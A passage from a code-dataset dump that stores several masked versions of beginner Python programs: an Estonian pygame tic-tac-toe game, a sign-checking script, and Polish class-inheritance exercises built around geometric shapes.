joonestik[0][0]\n pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2\n ] is not None:\n võitja = joonestik[0][2]\n pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis(tabel):\n global XO, võitja\n if võitja is None:\n sõnum = XO + ' käib'\n else:\n sõnum = võitja + ' võitis!'\n font = pygame.font.Font(None, 24)\n tekst = font.render(sõnum, 1, (0, 0, 0))\n tabel.fill((250, 250, 250), (0, 300, 300, 25))\n tabel.blit(tekst, (10, 300))\n\n\nXO = 'X'\njoonestik = [[None, None, None], [None, None, None], [None, None, None]]\ntabel = init_tabel(ttt)\njooksutab = 1\nwhile jooksutab == 1:\n for event in pygame.event.get():\n if event.type is QUIT:\n jooksutab = 0\n elif event.type is MOUSEBUTTONDOWN:\n klikk_tabelis(tabel)\n mängu_võitja(tabel)\n näita_tabelit(ttt, tabel)\n if võitja is not None:\n break\n",
"step-4": "import pygame\nfrom pygame.locals import *\npygame.init()\nttt = pygame.display.set_mode((300, 325))\npygame.display.set_caption = 'Trips-Traps-Trull'\nvõitja = None\n\n\ndef init_tabel(ttt):\n taust = pygame.Surface(ttt.get_size())\n taust = taust.convert()\n taust.fill((250, 250, 250))\n pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)\n return taust\n\n\ndef näita_tabelit(ttt, tabel):\n hetkeseis(tabel)\n ttt.blit(tabel, (0, 0))\n pygame.display.flip()\n\n\ndef hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):\n if Ykoordinaat < 100:\n rida = 0\n elif Ykoordinaat < 200:\n rida = 1\n else:\n rida = 2\n if Xkoordinaat < 100:\n veerg = 0\n elif Xkoordinaat < 200:\n veerg = 1\n else:\n veerg = 2\n return rida, veerg\n\n\ndef klikk_tabelis(tabel):\n global joonestik, XO\n Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()\n rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':\n return\n joonistamine(tabel, rida, veerg, XO)\n if XO == 'X':\n XO = 'O'\n else:\n XO = 'X'\n\n\ndef joonistamine(tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = tabeliveerg * 100 + 50\n Ykeskkoht = tabelirida * 100 + 50\n if Tähis == 'O':\n pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)\n else:\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),\n (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),\n (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n joonestik[tabelirida][tabeliveerg] = Tähis\n\n\ndef mängu_võitja(tabel):\n global joonestik, võitja\n for rida in range(0, 3):\n if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2\n ] and joonestik[rida][0] is not None:\n võitja = joonestik[rida][0]\n pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),\n (300, (rida + 1) * 100 - 50), 2)\n break\n for veerg in range(0, 3):\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg\n ] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg]\n pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0\n ), ((veerg + 1) * 100 - 50, 300), 2)\n break\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0\n ] is not None:\n võitja = joonestik[0][0]\n pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2\n ] is not None:\n võitja = joonestik[0][2]\n pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis(tabel):\n global XO, võitja\n if võitja is None:\n sõnum = XO + ' käib'\n else:\n sõnum = võitja + ' võitis!'\n font = pygame.font.Font(None, 24)\n tekst = font.render(sõnum, 1, (0, 0, 0))\n tabel.fill((250, 250, 250), (0, 300, 300, 25))\n tabel.blit(tekst, (10, 300))\n\n\nXO = 'X'\njoonestik = [[None, None, None], [None, None, None], [None, None, None]]\ntabel = init_tabel(ttt)\njooksutab = 1\nwhile jooksutab == 1:\n for event in pygame.event.get():\n if event.type is QUIT:\n jooksutab = 0\n elif event.type is MOUSEBUTTONDOWN:\n klikk_tabelis(tabel)\n mängu_võitja(tabel)\n näita_tabelit(ttt, tabel)\n if võitja is not None:\n break\n",
"step-5": "import pygame\n\nfrom pygame.locals import *\n\npygame.init()\nttt = pygame.display.set_mode((300,325)) #loome mänguakna\npygame.display.set_caption = (\"Trips-Traps-Trull\")\n\nvõitja = None\n\n\n\ndef init_tabel(ttt):\n taust = pygame.Surface(ttt.get_size())\n taust = taust.convert()\n taust.fill((250,250,250))\n \n #tõmbame jooned\n \n pygame.draw.line (taust, (0,0,0), (100,0), (100,300), 2) #vertikaalsed jooned\n pygame.draw.line (taust, (0,0,0), (200,0), (200,300), 2)\n\n pygame.draw.line (taust, (0,0,0), (0,100), (300,100), 2) #horisontaalsed jooned\n pygame.draw.line (taust, (0,0,0), (0,200), (300,200), 2)\n return taust\n\n\ndef näita_tabelit (ttt, tabel):\n hetkeseis(tabel)\n ttt.blit (tabel, (0,0))\n pygame.display.flip()\n\ndef hiire_positsioon_tabelis (Xkoordinaat, Ykoordinaat):\n if (Ykoordinaat < 100): #millisele reale klikib\n rida = 0\n elif (Ykoordinaat < 200):\n rida = 1\n else:\n rida = 2\n if (Xkoordinaat < 100): #millisele veerule klikib\n veerg = 0\n elif (Xkoordinaat < 200):\n veerg = 1\n else:\n veerg = 2\n return (rida, veerg)\n\ndef klikk_tabelis (tabel): #teeme kindlaks kuhu klikiti\n global joonestik, XO\n\n (Xkoordinaat, Ykoordinaat) = pygame.mouse.get_pos()\n\n (rida, veerg) = hiire_positsioon_tabelis (Xkoordinaat, Ykoordinaat)\n\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O': #kontrollime kas lahter on kasutusel\n return #lahter on juba kasutusel\n\n joonistamine (tabel, rida, veerg, XO) #joonista X või O\n \n if (XO == 'X'):\n XO = 'O' #käigu üleandmine teisele inimesele\n else:\n XO = 'X'\n\n\ndef joonistamine (tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = tabeliveerg * 100 + 50\n #leiame keskkoha\n Ykeskkoht = tabelirida * 100 + 50\n\n if (Tähis == 'O'): #joonistame O\n pygame.draw.circle (tabel, (0,0,0), (Xkeskkoht, Ykeskkoht), 44, 2)\n\n else:\n pygame.draw.line (tabel, (0,0,0), (Xkeskkoht - 22, Ykeskkoht - 22), (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n #joonistame X\n pygame.draw.line (tabel, (0,0,0), (Xkeskkoht + 22, Ykeskkoht - 22), (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n\n joonestik[tabelirida][tabeliveerg] = Tähis #märgime lahtri kasutatuks\n\n\ndef mängu_võitja(tabel): #kontrollib, kas kumbki võitis\n global joonestik, võitja\n\n for rida in range (0, 3): #kontrollime ridu\n if joonestik [rida][0] == joonestik[rida][1] == joonestik[rida][2] and joonestik [rida][0] is not None:\n võitja = joonestik[rida][0] #see rida võitis\n pygame.draw.line (tabel, (250,0,0), (0, (rida + 1)*100 - 50), (300, (rida + 1)*100 - 50), 2)\n break\n\n for veerg in range (0, 3): #kontrollime veerge\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg] #see veerg võitis\n pygame.draw.line (tabel, (250,0,0), ((veerg + 1)* 100 - 50, 0), ((veerg + 1)* 100 - 50, 300), 2)\n break\n\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0] is not None: #kontrollime diagonaale\n võitja = joonestik[0][0] #vasakult paremale diagonaal võitis\n pygame.draw.line (tabel, (250,0,0), (50, 50), (250, 250), 2)\n\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2] is not None:\n võitja = joonestik[0][2] #paremalt vasakule diagonaal võitis\n pygame.draw.line (tabel, (250,0,0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis (tabel): #kuva hetkeseis(kelle käik/kes võitis)\n global XO, võitja\n if võitja is None:\n sõnum = XO + \" käib\"\n else:\n sõnum = võitja + \" võitis!\"\n font = pygame.font.Font(None, 24)\n tekst = font.render(sõnum, 1, (0,0,0))\n#kopeerime sõnumi mänguaknas\n tabel.fill ((250, 250, 250), (0, 300, 300, 25))\n tabel.blit (tekst, (10, 300))\n\n\nXO = 'X' #X alustab\n\njoonestik = [ [ None, None, None ], #tühjad lahtrid\n\n [ None, None, None ],\n\n [ None, None, None ] ]\n\ntabel = init_tabel(ttt)\njooksutab = 1\nwhile jooksutab == 1:\n for event in pygame.event.get():\n if event.type is QUIT:\n jooksutab = 0\n elif event.type is MOUSEBUTTONDOWN:\n klikk_tabelis(tabel)\n\n mängu_võitja(tabel) #kontrollib võitjat peale igat käiku\n\n näita_tabelit(ttt,tabel) #uuendab mängulauda\n if võitja is not None:\n break\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
#!/usr/bin/python
def check(n):
if n == 0 :
print "neither Positive nor Negative"
if n < 0 :
print "Negative"
if n > 0 :
print "Positive"
print "10 is ", check(10)
print "-5 is ", check(-5)
print "0 is ", check(0)
|
normal
|
{
"blob_id": "9c6bb885c05ee13a283b09861a5aa7c5e62677cb",
"index": 1008,
"step-1": "#!/usr/bin/python\ndef check(n):\n if n == 0 :\n print \"neither Positive nor Negative\"\n if n < 0 :\n print \"Negative\"\n if n > 0 :\n print \"Positive\"\n\n\n\nprint \"10 is \", check(10)\nprint \"-5 is \", check(-5)\nprint \"0 is \", check(0)",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Punkt(Figura):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Linia(Figura):
def __init__(self):
print('Tworze obiekt klasy Linia...')
def wyswietl(self):
print('Metoda wyswietl klasy Linia.')
def wypelnij(self):
print('Metoda wypelnij klasy Linia.')
def usun(self):
print('Metoda usun klasy Linia.')
class Kwadrat(Figura):
def __init__(self):
print('Tworze obiekt klasy Kwadrat...')
def wyswietl(self):
print('Metoda wyswietl klasy Kwadrat.')
def wypelnij(self):
print('Metoda wypelnij klasy Kwadrat.')
def usun(self):
print('Metoda usun klasy Kwadrat.')
class XXOkrag:
def __init__(self):
print('Tworze obiekt klasy XXOkrag...')
def wyswietlaj(self):
print('Metoda wyswietlaj klasy XXOkrag.')
def wypelniaj(self):
print('Metoda wypelniaj klasy XXOkrag.')
def usuwaj(self):
print('Metoda usuwaj klasy XXOkrag.')
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy XXOkrag.')
def nadaj_polozenie(self):
print('Metoda nadaj_polozenie klasy XXOkrag.')
def ustaw_kolor(self):
print('Metoda ustaw_kolor klasy XXOkrag.')
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Punkt(Figura):
def __init__(self):
print('Tworze obiekt klasy Punkt...')
def wyswietl(self):
print('Metoda wyswietl klasy Punkt.')
<|reserved_special_token_0|>
def usun(self):
print('Metoda usun klasy Punkt.')
class Linia(Figura):
def __init__(self):
print('Tworze obiekt klasy Linia...')
def wyswietl(self):
print('Metoda wyswietl klasy Linia.')
def wypelnij(self):
print('Metoda wypelnij klasy Linia.')
def usun(self):
print('Metoda usun klasy Linia.')
class Kwadrat(Figura):
def __init__(self):
print('Tworze obiekt klasy Kwadrat...')
def wyswietl(self):
print('Metoda wyswietl klasy Kwadrat.')
def wypelnij(self):
print('Metoda wypelnij klasy Kwadrat.')
def usun(self):
print('Metoda usun klasy Kwadrat.')
class XXOkrag:
def __init__(self):
print('Tworze obiekt klasy XXOkrag...')
def wyswietlaj(self):
print('Metoda wyswietlaj klasy XXOkrag.')
def wypelniaj(self):
print('Metoda wypelniaj klasy XXOkrag.')
def usuwaj(self):
print('Metoda usuwaj klasy XXOkrag.')
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy XXOkrag.')
def nadaj_polozenie(self):
print('Metoda nadaj_polozenie klasy XXOkrag.')
def ustaw_kolor(self):
print('Metoda ustaw_kolor klasy XXOkrag.')
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Punkt(Figura):
def __init__(self):
print('Tworze obiekt klasy Punkt...')
def wyswietl(self):
print('Metoda wyswietl klasy Punkt.')
def wypelnij(self):
print('Metoda wypelnij klasy Punkt.')
def usun(self):
print('Metoda usun klasy Punkt.')
class Linia(Figura):
def __init__(self):
print('Tworze obiekt klasy Linia...')
def wyswietl(self):
print('Metoda wyswietl klasy Linia.')
def wypelnij(self):
print('Metoda wypelnij klasy Linia.')
def usun(self):
print('Metoda usun klasy Linia.')
class Kwadrat(Figura):
def __init__(self):
print('Tworze obiekt klasy Kwadrat...')
def wyswietl(self):
print('Metoda wyswietl klasy Kwadrat.')
def wypelnij(self):
print('Metoda wypelnij klasy Kwadrat.')
def usun(self):
print('Metoda usun klasy Kwadrat.')
class XXOkrag:
def __init__(self):
print('Tworze obiekt klasy XXOkrag...')
def wyswietlaj(self):
print('Metoda wyswietlaj klasy XXOkrag.')
def wypelniaj(self):
print('Metoda wypelniaj klasy XXOkrag.')
def usuwaj(self):
print('Metoda usuwaj klasy XXOkrag.')
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy XXOkrag.')
def nadaj_polozenie(self):
print('Metoda nadaj_polozenie klasy XXOkrag.')
def ustaw_kolor(self):
print('Metoda ustaw_kolor klasy XXOkrag.')
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Figura:
<|reserved_special_token_0|>
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy Figura.')
<|reserved_special_token_0|>
def wyswietl(self):
print('Metoda wyswietl klasy Figura.')
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Punkt(Figura):
def __init__(self):
print('Tworze obiekt klasy Punkt...')
def wyswietl(self):
print('Metoda wyswietl klasy Punkt.')
def wypelnij(self):
print('Metoda wypelnij klasy Punkt.')
def usun(self):
print('Metoda usun klasy Punkt.')
class Linia(Figura):
def __init__(self):
print('Tworze obiekt klasy Linia...')
def wyswietl(self):
print('Metoda wyswietl klasy Linia.')
def wypelnij(self):
print('Metoda wypelnij klasy Linia.')
def usun(self):
print('Metoda usun klasy Linia.')
class Kwadrat(Figura):
def __init__(self):
print('Tworze obiekt klasy Kwadrat...')
def wyswietl(self):
print('Metoda wyswietl klasy Kwadrat.')
def wypelnij(self):
print('Metoda wypelnij klasy Kwadrat.')
def usun(self):
print('Metoda usun klasy Kwadrat.')
class XXOkrag:
def __init__(self):
print('Tworze obiekt klasy XXOkrag...')
def wyswietlaj(self):
print('Metoda wyswietlaj klasy XXOkrag.')
def wypelniaj(self):
print('Metoda wypelniaj klasy XXOkrag.')
def usuwaj(self):
print('Metoda usuwaj klasy XXOkrag.')
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy XXOkrag.')
def nadaj_polozenie(self):
print('Metoda nadaj_polozenie klasy XXOkrag.')
def ustaw_kolor(self):
print('Metoda ustaw_kolor klasy XXOkrag.')
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Figura:
def __init__(self):
print("Tworze obiekt klasy Figura...")
def pobierz_polozenie(self):
print("Metoda pobierz_polozenie klasy Figura.")
def nadaj_polozenie(self):
print("Metoda nadaj_polozenie klasy Figura.")
def wyswietl(self):
print("Metoda wyswietl klasy Figura.")
def wypelnij(self):
print("Metoda wypelnij klasy Figura.")
def nadaj_kolor(self):
print("Metoda nadaj_kolor klasy Figura.")
def usun(self):
print("Metoda usun klasy Figura.")
class Punkt(Figura):
def __init__(self):
print("Tworze obiekt klasy Punkt...")
def wyswietl(self):
print("Metoda wyswietl klasy Punkt.")
def wypelnij(self):
print("Metoda wypelnij klasy Punkt.")
def usun(self):
print("Metoda usun klasy Punkt.")
class Linia(Figura):
def __init__(self):
print("Tworze obiekt klasy Linia...")
def wyswietl(self):
print("Metoda wyswietl klasy Linia.")
def wypelnij(self):
print("Metoda wypelnij klasy Linia.")
def usun(self):
print("Metoda usun klasy Linia.")
class Kwadrat(Figura):
def __init__(self):
print("Tworze obiekt klasy Kwadrat...")
def wyswietl(self):
print("Metoda wyswietl klasy Kwadrat.")
def wypelnij(self):
print("Metoda wypelnij klasy Kwadrat.")
def usun(self):
print("Metoda usun klasy Kwadrat.")
class XXOkrag:
def __init__(self):
print("Tworze obiekt klasy XXOkrag...")
def wyswietlaj(self):
print("Metoda wyswietlaj klasy XXOkrag.")
def wypelniaj(self):
print("Metoda wypelniaj klasy XXOkrag.")
def usuwaj(self):
print("Metoda usuwaj klasy XXOkrag.")
def pobierz_polozenie(self):
print("Metoda pobierz_polozenie klasy XXOkrag.")
def nadaj_polozenie(self):
print("Metoda nadaj_polozenie klasy XXOkrag.")
def ustaw_kolor(self):
print("Metoda ustaw_kolor klasy XXOkrag.")
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
if __name__ == "__main__":
lista_figur = [Linia(), Kwadrat(), Okrag()]
for fig in lista_figur:
fig.wyswietl()
|
flexible
|
{
"blob_id": "774bf2b49f6e546f16294edc17e9ac34fa8a9ba8",
"index": 2711,
"step-1": "<mask token>\n\n\nclass Punkt(Figura):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n <mask token>\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Punkt.')\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-4": "class Figura:\n <mask token>\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy Figura.')\n <mask token>\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Figura.')\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Punkt.')\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-5": "class Figura:\n def __init__(self):\n print(\"Tworze obiekt klasy Figura...\")\n def pobierz_polozenie(self):\n print(\"Metoda pobierz_polozenie klasy Figura.\")\n def nadaj_polozenie(self):\n print(\"Metoda nadaj_polozenie klasy Figura.\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Figura.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Figura.\")\n def nadaj_kolor(self):\n print(\"Metoda nadaj_kolor klasy Figura.\")\n def usun(self):\n print(\"Metoda usun klasy Figura.\")\n\nclass Punkt(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Punkt...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Punkt.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Punkt.\")\n def usun(self):\n print(\"Metoda usun klasy Punkt.\")\n\nclass Linia(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Linia...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Linia.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Linia.\")\n def usun(self):\n print(\"Metoda usun klasy Linia.\")\n\nclass Kwadrat(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Kwadrat...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Kwadrat.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Kwadrat.\")\n def usun(self):\n print(\"Metoda usun klasy Kwadrat.\")\n\nclass XXOkrag:\n def __init__(self):\n print(\"Tworze obiekt klasy XXOkrag...\")\n def wyswietlaj(self):\n print(\"Metoda wyswietlaj klasy XXOkrag.\")\n def wypelniaj(self):\n print(\"Metoda wypelniaj klasy XXOkrag.\")\n def usuwaj(self):\n print(\"Metoda usuwaj klasy XXOkrag.\")\n def 